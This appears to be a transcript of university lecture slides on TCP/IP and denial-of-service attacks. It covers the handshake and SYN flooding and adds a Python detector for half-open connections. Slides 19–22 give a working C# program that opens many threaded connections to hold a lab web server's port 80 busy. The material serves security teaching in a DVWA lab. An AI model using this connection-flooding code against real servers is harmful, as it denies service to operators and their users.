NAVY Research Group Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu 15 708 33 Ostrava-Poruba.

Presentation transcript:

1 NAVY Research Group, Department of Computer Science, Faculty of Electrical Engineering and Computer Science, VŠB-TUO, 17. listopadu 15, 708 33 Ostrava-Poruba, Czech Republic
Denial of service (DOS)

2 navy.cs.vsb.cz 2 TCP/IP model vs. OSI-RM

3 TCP/IP model

4 IP protocol
Defined in RFC 791
Operates on OSI Layer 3
Allows sending independent packets between stations of the internetwork
Unreliable, connectionless service

5 IP Header

6 TCP/IP transport layer (TCP)
Defined in RFC 793
The transport-layer entity (i.e. a process or service running on a particular machine) is identified by the machine's IP address and a port number (which is local to that machine)
The port number is a 16-bit number (0-65535)
– 0-1023: well-known services (80 - HTTP)
– 1024-4096: other registered applications (1433 - MSSQL Server)
– >4096: client (ephemeral) ports (usually assigned by the OS to the applications)


8 TCP protocol
Defined in RFC 793
Provides reliable duplex communication over unreliable IP
– IP may drop and duplicate packets and deliver them out of order
– TCP ensures reliability of data transfers for upper (application) layer protocols

9 TCP Header

10 TCP connection establishment
Three-way handshake: SYN, SYN+ACK, ACK
– Initial sequence number negotiation (independently for both directions)
– ISNs are "random" to avoid confusing the receiving station with delayed packets from a previous connection between the same stations
Opening a connection from both sides simultaneously results in a single connection

11 TCP connection establishment

12 TCP connection data flow

13 TCP connection termination
Either side may close the connection first
Both sides have to close the connection independently
– FIN+ACK (from both sides)

14 TCP connection in Wireshark

15 Denial of service attack (DOS)
A denial of service attack is characterized by an explicit attempt by attackers to prevent legitimate users of a service from using that service. For example:
– attempts to flood a network, thereby preventing legitimate network traffic
– attempts to disrupt connections between two machines, thereby preventing access to a service
– attempts to prevent a particular individual from accessing a service
– attempts to disrupt service to a specific system or person

16 DOS – TCP SYN Flooding
The goal is to prevent hosts or networks from communicating on the network.
The client system begins by sending a SYN message to the server. The server then acknowledges the SYN message by sending a SYN-ACK message to the client. The client then finishes establishing the connection by responding with an ACK message.
– The connection between the client and the server is then open, and the service-specific data can be exchanged between the client and the server.

17 DOS – TCP SYN Flooding
The potential for abuse arises at the point where the server system has sent an acknowledgment (SYN-ACK) back to the client but has not yet received the ACK message.
– The server has built in its system memory a data structure describing all pending connections. This data structure is of finite size, and it can be made to overflow by intentionally creating too many partially-open connections.
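As an added example (not part of the slides), the following Python script replays capture records of the kind the Wireshark slides show, tracks each client connection through SYN, SYN-ACK and ACK, and reports which sources leave connections half-open and whether the server's finite pending-connection table would be exceeded. The server address, the packet records and the backlog sizes are constructed assumptions.

```python
from collections import defaultdict

# Constructed sample in the style of a Wireshark capture of the demo:
# one tuple per segment (time, src, sport, dst, dport, flags).
# All addresses and timings are invented, not taken from the slides.
SERVER = "10.0.0.5"
PACKETS = [
    (0.00, "10.0.0.7", 50000, SERVER, 80, "S"),
    (0.01, SERVER, 80, "10.0.0.7", 50000, "SA"),
    (0.02, "10.0.0.7", 50000, SERVER, 80, "A"),   # legitimate, completed
] + [
    (0.10 + i * 0.001, "10.0.0.9", 40000 + i, SERVER, 80, "S") for i in range(300)
] + [
    (0.11 + i * 0.001, SERVER, 80, "10.0.0.9", 40000 + i, "SA") for i in range(300)
]
# 10.0.0.9 never answers the SYN-ACKs, so it leaves 300 half-open connections.


def track_half_open(packets, server_ip, server_port=80):
    """Replay the segments in time order and return {client_ip: half-open count}.
    A connection (client_ip, client_port) becomes "half_open" when the server's
    SYN-ACK is seen and "established" when the client's final ACK arrives."""
    state = {}  # (client_ip, client_port) -> "syn" | "half_open" | "established"
    for _t, src, sport, dst, dport, flags in sorted(packets, key=lambda p: p[0]):
        if dst == server_ip and dport == server_port:
            key = (src, sport)
            if flags == "S":
                state[key] = "syn"
            elif flags == "A" and state.get(key) == "half_open":
                state[key] = "established"
        elif src == server_ip and sport == server_port and flags == "SA":
            key = (dst, dport)
            if state.get(key) == "syn":
                state[key] = "half_open"
    half_open = defaultdict(int)
    for (ip, _port), s in state.items():
        if s == "half_open":
            half_open[ip] += 1
    return dict(half_open)


def flag_syn_flood_sources(packets, server_ip, backlog_size=256, per_source_limit=64):
    """Return (client IPs holding more than per_source_limit half-open connections,
    whether the total exceeds the assumed size of the server's pending table)."""
    half_open = track_half_open(packets, server_ip)
    suspects = sorted(ip for ip, n in half_open.items() if n > per_source_limit)
    backlog_exhausted = sum(half_open.values()) > backlog_size
    return suspects, backlog_exhausted
```

The same per-source counting can be applied to established-but-idle connections, which is the state the demo application leaves on the DVWA server.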

18 Demo - Tools
Hosted web application (DVWA)
Basic knowledge of some programming language (C#, Java, C++)

19 Demo
In a .NET (C#) application we need to open a TCP connection from the client (attacker's) application to the server.
– Use the System.Net.Sockets.TcpClient class
    TcpClient tcpClient = new TcpClient();
We need to open the connection to a specific IP address and a specific port (HTTP uses TCP 80, HTTPS uses TCP 443)
– Use the System.Net.IPEndPoint class
    IPEndPoint endPoint = new IPEndPoint(IPAddress.Parse(ipAddress), 80);

20 Demo
And finally we open the connection
    tcpClient.Connect(endPoint);
To overload our testing web application, we need to open many connections. However, all network operations are blocking, so we need to open each connection in its own thread.
– Use the System.Threading.Thread class
    Thread thread = new Thread(FunctionDelegateToExecute);
    thread.Start();

21 Demo
The final method could look like

    // Opens one connection to port 80 and holds it open until 'run' is cleared.
    private static void SendRequest(string ipAddress, string threadName)
    {
        TcpClient tcpClient = new TcpClient();
        IPEndPoint endPoint = new IPEndPoint(IPAddress.Parse(ipAddress), 80);
        try
        {
            tcpClient.Connect(endPoint);
            Console.WriteLine("Thread #{0}: {1}", threadName, DateTime.Now);
        }
        catch (Exception) { }
        while (run)
        {
            Console.WriteLine("Thread #{0}: {1} sleeps", threadName, DateTime.Now);
            Thread.Sleep(1000);
        }
        tcpClient.Close();
    }

22 Demo
The final application could look like

    using System;
    using System.Collections.Generic;
    using System.Net;
    using System.Net.Sockets;
    using System.Threading;

    private static bool run = true;

    static void Main(string[] args)
    {
        string ipAddress = "192.168.XXX.XXX";
        int threads = 100;
        List<Thread> threadPool = new List<Thread>();
        for (int i = 0; i < threads; i++)
        {
            int index = i;   // copy the loop variable so each thread gets its own name
            ThreadStart threadStart = () => SendRequest(ipAddress, index.ToString());
            var thread = new Thread(threadStart) { IsBackground = true };
            threadPool.Add(thread);
            thread.Start();
        }
        Console.ReadLine();   // wait for Enter, then stop all threads
        run = false;
        foreach (var thread in threadPool)
        {
            thread.Abort();
        }
    }

23 Demo – Legitimate traffic


25 Demo
Start Wireshark on the server with the DVWA application
Start your malicious application doing the DoS attack and

26 Demo
Try to access the DVWA web application from a browser

27 Demo
See the Wireshark log

28 References
– DVWA - http://www.dvwa.co.uk/
– CERT - https://www.us-cert.gov/ncas/tips/ST04-015
– CSRF - http://www.cgisecurity.com/csrf-faq.html
– Hacking Exposed (ISBN: 978-0-07-161375-0)
– Penetration Testing (ISBN-10: 1-59327-564-1)
– Principles of Computer Security (ISBN: 978-0-07-174857-5)

29 Warning
Hacking is illegal because it is getting into a system another person owns. If you wanted to do legal hacking then you would have to own the system.
